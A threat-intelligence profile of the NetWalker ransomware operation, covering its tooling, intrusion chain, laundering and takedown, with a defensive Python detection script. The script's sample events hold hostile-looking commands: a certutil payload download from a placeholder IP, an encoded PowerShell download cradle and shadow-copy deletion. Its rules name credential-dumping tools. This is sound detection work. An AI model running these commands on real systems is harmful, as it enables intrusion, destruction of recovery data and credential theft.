NetWalker
NetWalker is a ransomware family and ransomware-as-a-service (RaaS) operation that was active against organizations in the US, Australia, and Western Europe. It hit a diverse set of victims, and reporting indicated a shift toward larger enterprises rather than individuals. Its proceeds were laundered through services such as the Garantex cryptocurrency exchange, and U.S. law enforcement targeted the operation in January 2021, seizing approximately $500,000 in digital assets.

Tooling. According to the Sophos reporting cited here, NetWalker operators relied on legitimate remote administration software and publicly available offensive tools rather than custom malware for most of the intrusion: TeamViewer, AnyDesk, Sysinternals PsTools, SoftPerfect Network Scanner, Mimikatz and its variants Mimidogz and Mimikittenz, Windows Credential Editor, and the RDP brute-forcer NLBrute.

Initial access was not definitively established; the likely vectors were exploitation of known vulnerabilities in outdated Tomcat or WebLogic servers and/or weak RDP passwords. Post-compromise activity included reconnaissance, credential theft, password brute forcing, lateral movement over SMB, PsExec for remote execution, certutil for payload download, and, in at least one case, use of a Domain Admin account named SQLSVC.

Payload delivery. The ransomware was delivered by an obfuscated reflective PowerShell loader that decoded and decrypted its embedded payloads and executed them in memory. Each victim typically received a unique NetWalker DLL build, with the differences usually confined to the encrypted resource blobs. Before encryption, NetWalker deletes the host's Volume Shadow Copies to inhibit recovery from local snapshots.

NetWalker may also have had ecosystem overlap or partnerships with other RaaS operations through shared affiliates; UNC2628 in particular was assessed to have partnered with both REvil and NetWalker.
An affiliate of the NetWalker program was arrested in early 2021, and the operation shut down shortly afterward.
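The post-compromise chain described above (certutil pulling a payload, an encoded PowerShell loader, PsExec for remote execution, shadow-copy deletion, and credential-dumping tools) is a useful detection exercise. The following Python is an added example written for this page, not code from Sophos or any vendor: it runs a handful of command-line heuristics over process-creation events and then asks which hosts tripped more than one stage, because a single certutil or PsExec invocation is routine admin activity while three stages on one host within a short window is not. The sample events are constructed for the example; the regexes are generic tradecraft patterns, not NetWalker indicators, and the host names, user names and IP address are invented.

```python
"""Heuristic detection of the tradecraft attributed to NetWalker operators above.

Added example: the rules are generic command-line patterns mapped to ATT&CK
techniques, the events below are constructed, and nothing here is a NetWalker IOC.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (think Sysmon EID 1 / Security 4688)."""
    host: str
    user: str
    image: str
    cmdline: str


# (rule name, ATT&CK technique, regex applied to the lower-cased command line)
RULES = [
    # certutil -urlcache -f <url> <file>: living-off-the-land payload download.
    ("certutil_download", "T1105",
     re.compile(r"certutil(\.exe)?\s.*-urlcache\b.*\bhttps?://")),
    # PsExec targeting a remote host (\\HOST) to execute a command.
    ("psexec_remote_exec", "T1569.002",
     re.compile(r"\bpsexec(64)?(\.exe)?\s.*\\\\\S+")),
    # Encoded PowerShell or inline Base64 decoding, typical of reflective loaders.
    ("powershell_encoded_loader", "T1059.001",
     re.compile(r"powershell(\.exe)?\s.*(-e(nc|ncodedcommand)?\s+[a-z0-9+/=]{40,}|frombase64string)")),
    # Shadow copy deletion to inhibit recovery before encryption.
    ("shadow_copy_deletion", "T1490",
     re.compile(r"(vssadmin(\.exe)?\s.*delete\s+shadows|wmic(\.exe)?\s.*shadowcopy\s+delete)")),
    # Well-known credential dumpers named in the write-up (wce = Windows Credential Editor).
    ("credential_dumping_tool", "T1003",
     re.compile(r"\b(mimikatz|mimidogz|mimikittenz|wce)(\.exe)?\b")),
]


def evaluate(events):
    """Return (host, rule_name, technique) for every event that matches a rule."""
    hits = []
    for ev in events:
        cl = ev.cmdline.lower()
        for name, technique, rx in RULES:
            if rx.search(cl):
                hits.append((ev.host, name, technique))
    return hits


def hosts_with_multiple_stages(hits, threshold=2):
    """Hosts on which at least `threshold` distinct rules fired.

    Correlating stages per host is what separates an intrusion from an admin
    who legitimately used certutil or PsExec once.
    """
    by_host = {}
    for host, name, _ in hits:
        by_host.setdefault(host, set()).add(name)
    return sorted(h for h, names in by_host.items() if len(names) >= threshold)


# Constructed sample telemetry: one host showing three stages of the chain,
# one host showing a single PsExec hop, and two benign admin commands.
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent("WS-FIN-07", "CORP\\SQLSVC", "C:\\Windows\\System32\\certutil.exe",
              "certutil.exe -urlcache -split -f http://192.0.2.10/update.ps1 C:\\Users\\Public\\update.ps1"),
    ProcEvent("WS-FIN-07", "CORP\\SQLSVC", PS,
              "powershell.exe -nop -w hidden -enc "
              "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA"),
    ProcEvent("WS-FIN-07", "CORP\\SQLSVC", "C:\\Windows\\System32\\vssadmin.exe",
              "vssadmin.exe delete shadows /all /quiet"),
    ProcEvent("DC01", "CORP\\SQLSVC", "C:\\Tools\\PsExec.exe",
              "PsExec.exe \\\\FS02 -s -d cmd.exe /c whoami"),
    ProcEvent("WS-HR-03", "CORP\\jdoe", "C:\\Windows\\System32\\certutil.exe",
              "certutil.exe -verify C:\\certs\\corp-root.cer"),           # benign
    ProcEvent("WS-HR-03", "CORP\\jdoe", PS,
              "powershell.exe Get-Service -Name Spooler"),               # benign
]


if __name__ == "__main__":
    found = evaluate(SAMPLE_EVENTS)
    for host, name, technique in found:
        print(f"{host:<10} {technique:<10} {name}")
    print("escalate:", hosts_with_multiple_stages(found))
```

In a real pipeline the per-host correlation would be bounded by a time window (the same host hitting certutil on Monday and vssadmin a month later is a different story), and the credential-dumping rule should be backed by image hashes or in-memory detection, since the tool names here are trivially renamed.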
Recent activity
9 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Ransomware operation whose proceeds were processed/laundered via Garantex per U.S. Treasury.
Referenced as a ransomware threat group whose proceeds were laundered via the Garantex cryptocurrency exchange.
Named ransomware operation noted as reducing activity after law-enforcement raids.
Ransomware program discussed in relation to the arrest of an affiliate and the administrator Bugatti; cited by Wazawaka as an example of operational failure and shutdown.